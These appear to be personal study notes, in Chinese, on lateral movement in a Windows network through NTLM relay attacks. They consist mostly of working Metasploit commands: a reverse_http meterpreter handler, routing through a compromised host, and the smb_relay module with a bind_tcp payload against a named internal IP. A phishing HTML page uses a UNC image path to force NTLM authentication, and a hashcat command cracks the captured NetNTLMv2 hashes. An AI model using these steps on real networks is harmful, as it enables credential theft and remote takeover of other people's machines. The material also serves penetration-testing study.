用途:个人学习笔记,有所借鉴,欢迎指正!
目录
一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线
5、受控主机输入命令:dir \\192.168.46.166\c$
二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解
前提知识:
CS上线后,system高权限用户切换至低权限用户
MSF上线后, 高权限用户切换低权限用户
dir命令理解
一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线
条件:两台主机用户密码一致
1、CS权限转给MSF:
spawn l-msf
2、MSF:
监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run
3、添加路由:
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
backgroup //返回
4、smb_relay重发模块:
use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32 //转发攻击目标
set lhost 192.168.46.166 //设置本地 IP
set autorunscript post/windows/manage/migrate
主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
run
5、受控主机输入命令:dir \\192.168.46.166\c$
由于kali(192.168.46.166)的smb_relay重发模块做了中继攻击,使得主机192.168.3.32上线到kali MSF
二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解
1、监听拦截
2、触发拦截
dir \\192.168.3.x\c$
2.1、钓鱼触发
http://192.168.3.31/1.html
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<img src="file:///\\192.168.3.32\2">
</body>
</html>
3、破解密文
hashcat -m 5600 hash pass.txt --show